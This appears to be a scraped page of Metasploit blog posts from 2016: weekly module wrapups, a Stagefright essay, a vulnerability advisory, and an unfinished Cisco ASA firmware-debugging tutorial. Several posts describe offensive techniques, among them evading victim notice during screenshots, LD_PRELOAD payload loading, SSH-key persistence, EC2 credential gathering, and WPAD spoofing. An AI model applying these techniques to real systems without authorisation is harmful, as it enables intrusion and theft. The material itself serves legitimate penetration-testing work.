Skip navigation
All Places > Metasploit > Blog
1 2 3 Previous Next


661 posts

Pokemon Go started it.


The crusty old house cell phone, which we had years ago ported from a genuine AT&T land line to a T-Mobile account, suddenly caught the attention of my middle son.

  "Hey Dad, can I use that phone to catch Pokemon at the park?"


"Sure! Have fun, and don't come back until sundown!"

A few minutes later, he had hunted down his first Pikachu, which apparently required running around the block in Texas summer heat a few times. Sweat-soaked but proud, he happily presented his prize. I could get used to this! The kids were getting out of the house, exploring the neighborhood, having fun, and I was getting a little peace and quiet. Then one day, Pokemon Go stopped working, stating that it did not support 'rooted' phones.


First some back story. Our 'house phone' role is generally filled by the most-working last-gen reject device that is too old to be useful as a daily driver, but too new to throw away. In this case, it was a Google Nexus 4. I have always preferred the Google phones over other third parties for a number of reasons:


  • They're cheap if you get the last generation (and sometimes the current).
  • They usually lead the pack when it comes to software updates and hackability.


However, given the industry's appetite for quick turnarounds and obsolescence cycles, (and in spite of Google's generally good support) this phone is end-of-life, and has not received an official firmware update in over a year. In fact, this phone is the amalgamation of two Nexus 4's, combined into a frankenstein assemblage of the most-working screen, battery, and charging ports of the original pair.


Since it has been a year and a half since Google released a firmware for this phone, I had it running the next-best thing: Cyanogenmod 13, which backported Android 6 to this hardware. Now, this junker phone is up-to-date as much as

the Android Open Source Project (AOSP) allows. But, there was now a show-stopper: you now can't run Pokemon Go on rooted phones using Cyanogenmod. Technically, there is a new set of hacks, but this is a cat-and-mouse game, but there comes a time in your life when you just want things to work. And they were already hooked.


Why did Niantic decide to impose this restriction after several months of unrestricted access? It comes down to cheaters. People were rooting their phones specifically to fake GPS coordinates to get rare Pokemon, grow eggs, etc. Since having root access is also required to install non-stock firmware, in this guilty-until-proven-innocent model, we basically get to choose between two possibilities: get up-to-date software but sacrifice the ability to run some applications, or run increasingly out-of-date 'official' software, for the sake of satisfying a DRM or anti-cheating scheme.


In the end, I decided that the stock firmware still allowed upgrading a lot of the key components via the Google's Play Store, the real core around which an increasing amount of the software in the Android ecosystem relies. Sure, I'm not getting the latest advances in encrypted filesystems, kernel hardening, or process isolation in the latest versions of Android, but it's a tradeoff. Maybe the phone will have died completely by the time the next exploitable bug in libstagefright rears its head.


But, maybe it already has.


It took over a year for enough of the moving parts for a reliable exploit for CVE-2015-3864, one of the 'StageFright' series of vulnerabilities, to come together within Metasploit. The exploit needed new payloads, new techniques, and a number of independent research projects to become useful outside of the proof-of-concept realm. In the end, it works very well, even better than the Metaphor exploit from earlier this year, and can be easily targeted to any vulnerable Nexus phone.


Ironically, the very openness of the Google Nexus ecosystem made porting the exploit to those firmware builds particularly easy. In contrast, Samsung firmware, which contains many proprietary additions to the base Android system, and is not open-source, is harder to target simply because it is harder to examine. In spite of this, it was still possible to target Samsung phones as well. Effectively, with enough effort, any firmware is exploitable. It is just a question of time.


When you think of exploits in the StageFright family, think of the vector: someone sends a special text message and take over a phone without anyone even reading it. You get an email, and without opening it, code is already executed on your device. It's a simple concept, but the fix is not nearly as straightforward.


Automatic parsing of metadata in media files is a commonly-researched and targeted vulnerability in many different products. Adobe flash has had nasty vulnerabilities in its MP3 metadata parsing code earlier this year. Apple iOS has

been vulnerable a number of times to similar attacks. Just last month, similar vulnerabilities in Android's libutils library were found, which could be attacked in a similar way.


The exploit that we included in Metasploit for CVE-2015-3864 only targets one vector (web browser) and one file type (MP4 video files). However, there are many other vectors and file types that could also be exploited in the same family, that were discovered around the same time period as CVE-2015-3864. Not only that, but more vectors and file types have been found since the original round of StageFright branded vulnerabilities were hot in the news, and quietly patched.


Of course, none of these patches have made it into the official firmware for my Nexus 4. I even had to do a double-take in researching this article, since Wikipedia claimed Android 5.1.1 was last updated 2 months ago, while I knew the phone hadn't gotten an over-the-air update in some time. To really know if you're up-to-date, you have to look at the build number, Nexus 4 being on LMY48T while the latest is LMY49M. It's unlikely that the average consumer with a phone running Android '5.1.1' would be able to know difference between a vulnerable or up-to-date build number, much less the average business with a bring-your-own-device policy.


The choice between running the software you want, like Pokemon Go, and the quick road to obsolete devices in the Android ecosystem, at best forces users to make a choice between security and functionality. The theoretical exploit chains being patched this year can easily turn into next year's reliable Metasploit module.


Maybe it's time to bring back to a land line.


Weekly Metasploit Wrapup

Posted by egypt Employee Oct 7, 2016

Silence is golden


Taking screenshots of compromised systems can give you a lot of information that might otherwise not be readily available. Screenshots can also add a bit of extra spice to what might be an otherwise dry report. For better or worse, showing people that you have a shell on their system often doesn't have much impact. Showing people screenshots of their desktop can evoke a visceral reaction that can't be ignored. Plus, it's always hilarious seeing Microsoft Outlook open to the phishing email that got you a shell. In OSX, this can be accomplished with the module post/osx/capture/screenshot. Prior to this week's update, doing so would trigger that annoying "snapshot" sound, alerting your victim to their unfortunate circumstances. After a small change to that module, the sound is now disabled so you can continue hacking on your merry way, saving the big reveal for some future time when letting them know of your presence is acceptable.


Check your sums before you wreck your sums


Sometimes you just want to know if a particular file is the same as what you expect or what you've seen before. That's exactly what checksums are good at. Now you can run several kinds of checksums from a meterpreter prompt with the new checksum command. Its first argument is the hash type, e.g. "sha1" or "md5", and the rest are remote file names.


Metadata is best data, everyone know this


As more and more infrastructure moves to the cloud, tools for dealing with the various cloud providers become more useful.


If you have a session on an AWS EC2 instance, the new post/multi/gather/aws_ec2_instance_metadata can grab EC2 metadata, which "can include things like SSH public keys, IPs, networks, user names, MACs, custom user data and numerous other things that could be useful in EC2 post-exploitation scenarios." Of particular interest in that list is custom user data. People put all kinds of ridiculous things in places like that and I would guess that there is basically 100% probability that the EC2 custom field has been used to store usernames and passwords.


Magical ELFs


For a while now, msfvenom has been able to produce ELF library (.so) files with the elf-so format option. Formerly, these only worked with the normal linking system, i.e., it works when an executable loads it from /usr/lib or whatever but due to a couple of otherwise unimportant header fields, it didn't work with LD_PRELOAD. For those who are unfamiliar with LD_PRELOAD, it's a little bit of magic that allows the linker to load up a library implicitly rather than as a result of the binary saying it needs that library. This mechanism is often used for debugging, so you can stub out functions or make them behave differently when you're trying to track down a tricky bug.


It's also super useful for hijacking functions. This use case provides lots of fun shenanigans you can do to create a userspace rootkit, but for our purposes, it's often enough simply to run a payload so a command like this:

LD_PRELOAD=./ /bin/true

will result in a complete mettle session running inside a /bin/true process.


New Modules


Exploit modules (1 new)

Auxiliary and post modules (3 new)s


Get it


As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.12.28...4.12.30


To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.


Weekly Metasploit Wrapup

Posted by egypt Employee Sep 30, 2016

Extra Usability


Commandline tools in general are powerful, but come with a learning curve. When you've been using a tool for a long time, that curve becomes a status quo that embeds itself in your fingers. That isn't always a good thing because it tends to make you blind to how things can be better and it takes an effort of introspection to notice inefficiencies. Even then, you weigh those inefficiencies against the effort required to improve.


An example of that is msfconsole's route command, which gets a bit of a spruce up this week. Instead of showing help output when given no arguments, it now shows the current routing table. In addition, it now supports using a session id of "-1" to indicate the most recent session, just like you can do for the SESSION option in post modules.


Extra privilege escalation


In the last few years, privilege escalation has become more important in the Windows world but it has always been a staple on Unix operating systems. This update brings two privilege escalation modules, one for the Linux kernel and one for NetBSD's /usr/libexec/mail.local, for your rooting pleasure.


Extra Meta Metasploitation


2ENTk2K2.pngAs I mentioned in the last wrapup, we've landed @justinsteven's modules for attacking Metasploit from Metasploit. The first, metasploit_static_secret_key_base, exploits the way Rails cookies are serialized and the fact that an update would step on the randomly generated secret key with a static one. Check out the full detailsif you're interested in how that works.


The second, metasploit_webui_console_command_execution, isn't a vulnerability as such. Rather, it takes advantage of the fact that admin users can run msfconsole in the browser, and therefore run commands on the server. This is the sort of thing that can't be patched without just removing the functionality altogether; it's literally a feature, not a bug. Authenticated administrators can do administrator things, as you might expect.


Extra Android Exploit


Stagefright_bug_logo.pngAt Derbycon last week, long-time friend of the Metasploit family, @jduck, released his latest version of Stagefright, an exploit for Android's libstagefright. He demo'd exploiting a Nexus device, but lots of other stuff is vulnerable too. Due to the rampant fragmentation in the Android world, this year-old bug is probably going to be showing up on new phones sitting on store shelves for quite a while yet.


Extra Bacon


And last but not least, this week brings a module for exploiting EXTRABACON, the Cisco ASA vulnerability made public by the Shadowbroker leak a few weeks ago. The bug is a buffer overflow in SNMP object id strings. The module does exactly what the Equation Group exploit does -- it disables authentication on the victim device and allows you to login to ssh or telnet with no password. This module was a collaboration between lots of folks and improves on the coverage in the original exploit, even adding targets for some 9.x devices that the advisory says are not affected.


This democratization of exploits through open source continues to show that being open and transparent leads to better exploits, more public knowledge, and better patches.


New Modules


Exploit modules (7 new)


Auxiliary and post modules (1 new)

Get it


As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.12.25...4.12.28


To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

A number of important security issues were resolved in Metasploit (Pro, Express, and Community editions) this week. Please update as soon as possible.



Issue 1: Localhost restriction bypass

    (affects versions 4.12.0-2016061501 through 4.12.0-2016083001)


On initial install, the Metasploit web interface displays a page for setting up an initial administrative user. After this initial user is configured, you can login and use the Metasploit web UI for the first time. Since this initial screen is unauthenticated, it can only be accessed via a local user (e.g. hitting the localhost hostname or loopback IP address


Until the most current release, the initial setup page access restriction does not work properly in Metasploit 4.12.0 releases. Instead, on initial install, the page for setting up the initial administrative user is accessible from all addresses on the host running Metasploit.  An attacker might be able to 'race' a fresh Metasploit installation and become the first to create an administrative user.



For users who are planning on using Metasploit with the web interface, it is important to isolate the machine from hostile networks until initial configuration is complete, or be sure to use the latest Metasploit installer in which this issue is resolved.


Thanks to Brandon Perry for discovering and reporting this issue.


Issue 2: Predictable session cookies

    (affects versions 4.12.0-2016061501 through 4.12.0-2016083001)


Metasploit uses a randomized secret key to protect session cookies from forgeries. On installation, it randomizes the secret key and stores it in a local configuration file.


As of Metasploit 4.12.0, the update packages inadvertently include a static version of this secret key file, which overwrites the randomly-generated one. The effect of this is that some Metasploit installations will all have the same hard-coded base session token, leading to forgeable session cookies, allowing an unauthenticated user to perform remote code execution via another object deserialization bug.



On startup, Metasploit will identify 'bad' static secret keys that may be installed, and if found, the base secret key is regenerated. If this fix is needed, and if a user is applying the latest update via the web UI, the UI may appear to hang during the update, though it will complete successfully in the background. In this case, simply refresh the web UI after 10-20 minutes. If it loads a login screen, the update applied successfully.


Users who updated from 4.11.0 or earlier builds are not affected, but are still encouraged to update.


Thanks to Justin Steven for discovering and reporting this issue.


Issue 3: `config.action_dispatch.cookies_serializer` is set to `:hybrid`

    (affects versions 4.12.0-2016061501 through 4.12.0-2016083001)


Metasploit versions 4.11.x and earlier use the default 'marshal' cookie type, which is vulnerable to remote object instantiation / remote code injection for a user who has the ability to generate a signed session cookie.



The Metasploit 4.12.0 point release switched to the 'hybrid' type, which gives an update path for users to the safer 'json' type. The latest release switches entirely to 'json' cookie serialization method.


Thanks to Justin Steven for discovering and reporting this issue.


Weekly Metasploit Wrapup

Posted by egypt Employee Sep 16, 2016

Security is hard


I usually focus exclusively on the Metasploit Framework here on these wrapups, but this week is a little special. This week the Metasploit commercial products (Pro, Express, and Community) come with a fix for a couple of vulnerabilities. You heard that right, remotely exploitable vulns in Metasploit. Our lovely engineering manager, Brent Cook, helpfully wrote up the details yesterday.


TL;DR - Three bugs, two of which work together: 1) the filter restricting the creation of the first admin account to localhost was broken. As has always been the case having an admin account on Metasploit lets you run commands on the server. And 2) the randomly generated session key got stepped on by a static one whenever updates were applied, so the same key was used for every Metasploit installation. Because of 3) session cookies are serialized ruby, so that's code exec, too.


Security is hard and even experts like us screw it up some times. But in true Metasploit fashion, we're not content to just patch the vuln. There is currently a Pull Request in review that will get you shells on Metasploit if you know credentials. Since it's Authenticated Code Execution by Design, it will work even without this vulnerability as long as you can steal a username and password. Expect that to land soon and be in the next wrapup. And while you're waiting, go double check to make sure you did the initial account setup on your Metasploit installs.


Download improvements


It's a bit of a hassle if a download gets interrupted, especially if the file is large. Thanks to first-time contributor cayee, you can now continue an interrupted download with Meterpreter's new download -c.


Module documentation


We've been pumping out better documentation for individual modules for a few months now, since the introduction of info -d, which gives you nice pretty markdown.


If you have wanted to contribute but didn't know what you wanted to work on, this is a great place to get started. Check out the Module Documentation milestone for a list of the modules we think are the highest priority. Github won't let you assign a ticket to someone who isn't part of the Metasploit organization, so leave a comment on one of those issues to claim it so others don't duplicate your work.


New Modules

Exploit modules (1 new)

Auxiliary and post modules (4 new)

Get it


As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.12.22...4.12.25


To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.


Weekly Metasploit Wrapup

Posted by egypt Employee Sep 2, 2016

PHP Shells Rising from the Flames


Phoenix Exploit Kit is your standard run-of-the-mill crimeware system, written in PHP, whose creator apparently got popped by the FSB earlier this year. Like many exploit kits, it has a back door, this one allowing you to eval whatever PHP code you like by sending it in a GET parameter (subtly named 'bdr'). Of course running arbitrary PHP allows us control of the underlying operating system to various degrees depending on configuration.


I love the idea of popping shells in malware. We've been doing it for a while, since way back in the day with exploit/windows/ftp/sasser_ftpd_port, an exploit for the FTP server run on compromised machines by the sasser worm, and I was delighted to discover that I'm not the only one who finds exploits for malware to be hilarious.


MalSploitBase is a database of exploits for known vulns in evil things just like these. Even better, its code is available on github ( and the author encourages pull requests.


How come you never call anymore?


If you create child processes from your Meterpreter session, you often want to keep track of them and make sure they're not staying out too late or getting caught up with the wrong crowd. A new option to Meterpreter's ps command makes that a little easier, giving you a nice printout of all the children of your current process.


Other Post stuff


A few fun new modules from an up-and-coming contributor h00die make persistence on Linux a bit easier in the latest release. One of the big advantages of having modules for doing persistence instead of dropping files manually is the ability to automate it. For example, putting post/linux/manage/sshkey_persistence in your AutoRunscript option for an exploit lets you automatically establish a way back in without having to think about it in the crucial first few minutes of having a shell.


And finally, for an exciting exfiltration extravaganza, post/multi/manage/zip gives you a platform-agnostic way of zipping up a directory for simplified pilfering.


New Modules


Exploit modules (5 new)

Auxiliary and post modules (3 new)


Get it


As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.12.19...4.12.22


To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

William Webb

Metasploit Weekly Wrapup

Posted by William Webb Aug 12, 2016

Las Vegas 2016 is in The Books


This week's wrap-up actually covers two weeks thanks in large part to the yearly pilgrimage to Las Vegas.  I myself elected not to attend, but I'm told everyone had a great time.  Many on the team are still recuperating, but I'd wager that they all enjoyed seeing you there as well.  Here's to everyone's speedy recovery.




Centreon Web UserAlias Command Execution


Our first new module this go-around exploits a remote command execution vulnerability in Centreon Web via a pre-auth SQL injection.  The bug, originally discovered by Nicolas Chatelain, is detailed in a nice writeup here:  The short version is that they don't escape "\", they call 'echo' via exec(), and very bad things happen.  Luckily the bug was promptly fixed in late 2014 and doesn't affect current versions, but, if for some reason you haven't updated by now, you should probably look into it.


Polycom Command Shell Authorization Bypass


Next, we have a module that managed to slip through the cracks for about 4 years now.  Sorry.  It targets an authorization bypass vulnerability in older firmware releases for the Polycom HDX line of video conferencing endpoints.  The original vulnerability discovery was made by Paul Haas in 2012 and publicly disclosed in January of 2013.  You can check out his original advisory here  Paul released a module at the time, but for some reason it wasn't incorporated into Metasploit Framework.  That's all changed thanks to h00die, who has ported the module to work with newer versions of the framework.  While bugs this old are often not that exciting, it's reasonable to assume that firmware for video equipment may be one of the last things on the mind of many IT administrators when considering a maintenance strategy for their organization, making this one a bit more interesting.


Drupal RESTWS Moule Remote PHP Code Execution


In other SQL injection news, we recently landed a module by Mehmet Ince targeting a remote code execution vulnerability in the Drupal 7.x RESTWS Module.  RESTWS versions below 2.6 in the 2.x series and 1.7 in the 1.x series are affected by the issue.  Despite resulting in arbitrary code execution on any host running the affect module, the bug is fairly simple, and exploitation couldn't be easier thanks to Mehmet's module:




Internet Explorer 11 VBScript Memory Corruption


Last week, some jerk wrote a module for CVE-2016-0189, which exploits a memory corruption vulnerability within Internet EXplorer 11's VBScript engine.  The module was based off the original PoC publicized by Theori, who provided an excellent writeup on their efforts reversing this interesting bug from patches here  In a nutshell, the exploit leverages some logical errors into a write primitive and uses this to enable execution of arbitrary VBScript.  While Internet Explorer 11 on Windows 10 isn't that popular, and VBScript is akin to a Lovecraftian horror that would drive one to insanity should they even contemplate it, vulnerabilities such as these are quite interesting to work with, especially given that mitigations against common browser exploit vectors such as Use-after-Free's continue to improve.



Utility Module Goodness


Our last two modules this week aren't exactly exploits, but they do provide some awesome auxiliary capabilities.  For one, we landed an incredibly useful SMB Delivery module by Andrew Smith and Russel Van Tuyl.  Hosting payloads via an SMB share is sometimes the best option available for delivery depending on the situation.  In the past, authors have had to roll their own SMB functionality into their Metasploit modules.  This module greatly simplifies that process. Finally, Robert Kugler submitted a module that lets one recover the installation password for recent versions of Avira Antivirus.


Weekly Metasploit Wrapup

Posted by egypt Employee Jul 22, 2016

Windows Privilege Escalation


In the long long ago, Windows users pretty much universally had local Administrator accounts. While that's still true in less mature environments, I think we have done a pretty good job as an industry of convincing folks to reduce users' privileges. Back in those days, privilege escalation exploits weren't all that useful because every exploit, executable, and Word macro already gave you the highest privileges. Today that's less true.


Even worse for the enterprising hacker, modern browser exploitation frequently gives you the lowest possible privileges, even without the ability to read or write files outside of certain directories or interact with processes other than your own, due to sandboxing. One major advantage of kernel vulnerabilities is the fact that they skip right out of those sandboxes straight to NT AUTHORITY\SYSTEM.


Two Windows vulnerabilities, one patched in February and the second in March, get exploits this week for your privilege escalating pleasure.


Test Our Mettle


Over the years there have been several iterations of Meterpreter for a POSIX environment, with limited success. As of this week, we're shipping a new contender for the throne of unix payloads: Mettle. It's a ground-up implementation of the Meterpreter protocol and featureset for multiple architectures and POSIX platforms. One of the barriers to such a payload has been the fact that it requires packaging up a static libc and any libraries it will need on target. This is in contrast to Windows where the extreme adherence to backwards compatibility through the ages means that things like socket functions in ws2_32.dll can be relied upon pretty universally, which just isn't remotely true of all the various unices. Android's Bionic libc was the most recent, but several issues have made it clear we needed something else. Mettle uses musl, a small, highly portable, optimized libc. While we're currently only testing Linux, musl's portability will give us the ability to expand to other things like Solaris and BSD in the future.


The old implementation will continue to live side-by-side with the new one for a while, but once Mettle has the main required features, the Bionic-based POSIX Meterpreter will be allowed to retire to a beach somewhere to drink margaritas and complain about kids these days.


New Modules


Exploit modules (5 new)

Auxiliary and post modules (3 new)

Get it


As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.12.11...4.12.14


To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.


Weekly Metasploit Wrapup

Posted by egypt Employee Jul 8, 2016

House keeping


Since the last Wrapup, we've been continuing our long-running project of breaking up some of the old cobweb-encrusted parts of the framework codebase into smaller pieces that are easier to deal with. A few things, lib/sshkey and lib/bit-struct in particular, that for historical reasons were just slightly modified copies of a gem, have been pulled out entirely in favor of the upstream release. A bunch of other things have been pulled out into their own repositories, making the whole codebase a little tidier.


NBNS and BadTunnel


NBNS is the NetBIOS Name Service, which Windows uses to do fast local translations of hostnames to IP addresses. Like DNS, being able to lie about answers gives an attacker the ability to act as a Man-in-the-Middle. Unlike DNS, Requests are sent broadcast to the local subnet. That means that listening for these requests and spoofing replies gets you a MitM stance on whatever they were requesting, a longstanding hacker favorite. This is also a downside because it means you have to be on the same local network as the victim to see those requests and know how to reply. However, all of this happens over UDP which routers don't mind forwarding on to different subnets. You just need to guess the transaction ID, a 16-bit number. As it turns out 16-bit numbers aren't that big and you can just spam packets until it works. You still need to know the hostname, though. Enter WPAD.


Hackers have loved Windows Proxy Automatic Discovery, or WPAD, forever. For those unfamiliar with it, it's an HTTP service that hosts a small piece of javascript for determining whether a given URL should go through a proxy. Windows uses this by default not just with all requests from Internet Explorer, but everything that uses the WinInet API.

One way to convince a client that you are their WPAD server is to respond to the NBNS lookup for a host with that name. Metasploit and other tools like have been providing that handy service for years to great effect. But now with you don't need to be on the same subnet. Now you can just spam replies for WPAD for a few seconds until you get lucky and suddenly you can be in the middle of all HTTP requests by claiming to be their proxy. And it gets better. If you can somehow convince someone to send any NetBIOS traffic your way, you can do the same across NAT, thanks to BadTunnel.


Have fun storming the castle.


Chained exploits


Nagios is a nifty monitoring tool that has basically become the defacto standard. They also produce a proprietary commercial frontend called Nagios XI. That frontend has a SQL injection vuln that can lead to authentication bypass. The bypass gives you access to a command injection. The command injection lets you run sudo without a password. Nothing but net.


Expect a more detailed write up on this one.


New Modules


Exploit modules (6 new)

Auxiliary and post modules (5 new)


Get it


As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.12.7...4.12.11


To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

Rapid7 announced the end of life of Metasploit Pro 32-bit versions for both Windows and Linux operating systems on July 5th, 2017.  This announcement applies to all editions: Metasploit Pro, Metasploit Express and Metasploit Community.  After this date Metasploit 32-bit platforms will not receive product or content updates. Metasploit framework will continue to provide installers and updates for the 32-bit versions.


MilestoneDescription      Date                 
End-of-life announcement dateThe date that the end-of-life date has been announced to the general public.July 5th, 2016
Last date of supportThe last date to receive service and support for the product.  After this date, all support services for the product are unavailable, and the product becomes obsolete.July 5th, 2017
Last date of available installersThe last date Rapid7 will generate 32-bit installers. After this date, Rapid7 will continue to provide updates until the last date of support.July 5th, 2016



Product Migrations

Customers are encouraged to migrate to Metasploit 64-bit versions of the product, installation files can be found in the following link.  When upgrading to there maybe changes to system requirements including memory, please view the System requirements to see if your current system meets the minimum requirements.  To migrate to a newer platform you create a platform independent backup and restore it on the new system, steps for migration can be found here.


More Information


For Metasploit Pro and Express customers, contact or your account manager for assistance.


For Metasploit Community customers, submit your inquiries to the community discussion forum.


For more information about Rapid7 End-Of-Life Policy, go to:


Weekly Metasploit Wrapup

Posted by egypt Employee Jun 16, 2016

Steal all the passwords


I talk a lot about Authenticated Code Execution, but of course that's not the only thing that authenticated access can get you. This week's update comes with a couple of modules for using known credentials to extract more credentials. The first is for Symantec Brightmail, an email filtering gateway that comes with a management interface for administrators. Any account with read access is allowed to look at the encrypted LDAP credentials stored in Brightmail. Fortunately for us, the encryption is reversible and the system also kindly uses a known key. The second module is for Canon multi-function printers, because of course your printer needs to store a bunch of plaintext passwords; I mean, why wouldn't it? This one also requires authentication, but it's a printer, so of course there's a default that no one ever changes.


Payload options in jobs output


To see the stuff running in the background, msfconsole has a jobs command. There are some pertinent pieces of info you usually want to see in that display, but a console interface makes it kinda tough to view it all because of the limited column width. A recent feature, the ability to control the URI a reverse_http payload calls back to with the LURI option, puts extra pressure on that limited space. To make that a little easier, payload options are now all condensed into a single column, so instead of seperate LPORT, LHOST, and LURI columns, you just have "Payload opts":



msf exploit(ie_cbutton_uaf) > jobs


  Id  Name                                       Payload                           Payload opts
  --  ----                                       -------                           ------------
  0   Exploit: windows/browser/adobe_flash_pcre  windows/meterpreter/reverse_http
  1   Exploit: windows/browser/ie_cbutton_uaf    windows/meterpreter/reverse_tcp   tcp://

msf exploit(ie_cbutton_uaf) > jobs -v


  Id  Name                                       Payload                           Payload opts                     URIPATH   Start Time                 Handler opts
  --  ----                                       -------                           ------------                     -------   ----------                 ------------
  0   Exploit: windows/browser/adobe_flash_pcre  windows/meterpreter/reverse_http  /flash    2016-06-16 13:50:31 -0500
  1   Exploit: windows/browser/ie_cbutton_uaf    windows/meterpreter/reverse_tcp   tcp://             /cbutton  2016-06-16 13:51:00 -0500 


Gifts that keep on giving

Shellshock is one of my favorite bugs of all time. It's simple to exploit, results in RCE, and is in a thing that everyone takes for granted. The latest incarnaiton of it is in IPFire, an open source Linux firewall, but I'm sure we'll see it again.


New Modules


Exploit modules (6 new)

Auxiliary and post modules (4 new)


Get it


As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.12.5...4.12.7


To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

Back in February, Exodus Intelligence released their blog entry titled "Execute My Packet", which detailed their discovery and exploitation of CVE-2016-1287.  Since then, I've fielded numerous requests for modules and witnessed much discussion generated from it.  From this discussion, I've gathered that many researchers seem to consider the Cisco ASA as an unruly beast, difficult to approach, even harder to tame.  I feel that this is far from the truth, and this article is a response to such notions.


We attempted a module and stopped.  Before explaining why, some disclosures may be in order: while I wasn't on this project with David or Jordan, I actually worked at Exodus Intelligence during the discovery of this vulnerability and the initial exploitation attempts.  Jordan's original exploit, which the public has seen, is impressive in itself, though not portable across ASA's due to loss of heap determinism given variances in device configurations.  I'm positive that given more time, he would have found an information leak necessary to circumvent that.  Unfortunately, both he and I left Exodus before the disclosure of the bug, so I can't comment on the decision to release it in such a state.


Since the initial disclosure, I’ve worked both with him and independently to find a fruitful memory disclosure, but to no avail.  Given enough time, I'm sure it would come about, but the bug is patched.  Releasing a module now that could be used to compromise one's own personal device running an outdated software release feels like a wasted effort at best.  Rather, with the aforementioned questions and discussions in mind, I felt that more value would be had in using this as a teaching opportunity.  Much of this article will be old hat to many of you, but on that note, you aren't the intended audience.


While some people appear to almost fear the ASA, and embedded reverse-engineering in general, I'd argue that this is simply because it is an unknown.  I believe this is actually an extremely good way to get one's feet wet in the field.  The ASA runs on a common architecture, can be had with a valid license relatively cheap, and requires no electronics knowledge to begin picking apart.  Any bugs you may eventually find could prove rather valuable.  How much better could it be?


First Steps

The first step in all of this obviously involves setting up a research environment.  Though other, cheaper options do exist, by far the easiest approach to this is purchasing an ASA.  The other options include possibly using the ASA virtual appliance (which I have not investigated at all), or virtualization of the system software via other means.  I did attempt getting it running inside of QEMU, but the amount of work required to succeed when all you want to do is debug is quite daunting, so I went with a physical device.  In a town where tech startups crash and burn everyday, obtaining a used ASA on Craigslist is infinitely easier and cheaper when considering how much your time is worth.  For those of you so inclined, many Cisco certification seekers have formed a community centered around the effort to emulate the software within QEMU and GNS3.  Patches, scripts aimed at both packing and unpacking images, and hacked binaries exist for several older versions; however, there was none available at the time of writing for the vulnerable release.  Google is your friend!


On the hardware end, if you do end up getting an actual ASA, be sure to upgrade the RAM if it's operating with anything less than 256MB.  Debugging via the serial console is slow, and you'll likely be rebooting the device a lot.  You definitely want to eliminate any bottlenecks that you can before you begin.  Cisco sold branded memory for the device at quite a premium which is guaranteed to work.  I myself decided to risk $12 on a 1GB PC-3200 184 pin DIMM from Fry's that looked as if a small animal had been using the packaging as a chew toy.  So far it has worked flawlessly.  YMMV.  As for the serial connection, I use and recommend Parallax's USB to RS-232 adapter []


Platform Overview




My bookshelf is lined with tomes such as Compilers (the classic "dragon book"), Windows NT Device Driver Development, Inside OLE, and many other equally thick books.  I am all for rigorous academic discourses on various topics when the situation calls for it.  This is not such a situation.  I feel that reverse engineering is often more about knowing what you need to ignore than trying to know everything one possibly can.  That said, I'm going to gloss over a lot of details which are well defined elsewhere.  For our purposes, I believe the salient points that require focus are as follows:


  • The Cisco ASA 5505 is a tiny computer
  • It's x86
  • It has a lot of network interfaces
  • It has a removable CF card which contains the firmware image
  • It runs Linux
  • The system boot sequence involves traversing through the BIOS, ROMMON (ROM Monitor, Cisco's bootstrap program available on this and other devices), GRUB, and off into Linux land which ends by loading the lina binary, which we will speak more of later.  The boot sequence is important because in order to do what we want, we have to hijack it.


Armed with this knowledge and a Cisco ASA 5505 in either it's physical or virtual manefestation, we're ready to get started.


Un-nesting the Matryoshka Dolls


The next step in our progression is to get setup for debugging.  Thankfully, Cisco was kind enough to include gdbserver on the firmware image, but for some unknown reason, they didn't make access to it very straightforward.  "Jailbreaks" from the CLI in earlier releases have been accomplished by unpacking the firmware, editing some script or another to start /bin/sh, repacking the firmware, and hoping that you didn't screw up somewhere along the line.  You can find details regarding techniques such as these in the excellent presentation "Breaking Bricks and Plumbing Tips" by Alec Stuart-Muirk.  (Alec's presentation is actually really, really good.  You should definitely check it out after reading this)


As I mentioned earlier, shell scripts and techniques for unpacking and repacking the firmware exist online, albeit not publicly for version 9.2.4.  While I won't link them, they are worth investigating for educational purposes, as the same general approach can be used for reversing firmware for other devices.  'xxd', 'dd', a keen mind, and a little experience are all that are truly required.  I recommend you also check out devttys0's excellent tool binwalk, as it can simplify much of the process for you.


I had originally intended to extract and repack the firmware myself, but after bouncing around ideas with David Barksdale, he provided me with alternative, that being a zen-like, that's-so-stupid-why-didn't-i-think-of-that, offset.  Assuming you have a copy of the vulnerable ASA firmware (asa924-k8.bin), open the file in your favorite hex editor.  From there, proceed to offset 0x1d1a03c.  You should see something like




This certainly looks relevant to our interests, almost like it might be Linux kernel boot parameters or something.  I wonder what would happen if we used a clever 1994 era trick and overwrite some of these options with something like:





Save the file as something like asa924-k8-hax.bin


Once we have our modified image, we can transfer it to our device using one of a few methods, such as via TFTP from the ROMMON interface, or writing it to the CF card.  I had one laying around, so I went the card writer route.  With the CF card mounted in the OS of your choice, you can simply copy the file to the top level directory.  The TFTP process is fairly simple and well documented in the product manuals, so there's no need to run out and buy one if you're lacking such.


iomega-floppy-plus-7-in-1-card-reader-usb-powered-drive-cre-01a_401076393934.jpg    This project helped justify Brent's obsession with hoarding archaic historical relics



When you see “Use BREAK or ESC to interrupt boot”, do exactly as it says, and you should end up with something quite similar:




From the ROMMON prompt, we can force the device to load our firmware by using


boot disk0:/asa924-k8-hax.bin


Hit enter and be patient.  The boot time is excruciatingly slow in this age of NVMe SSD's.  Before too long, you should see something like this:




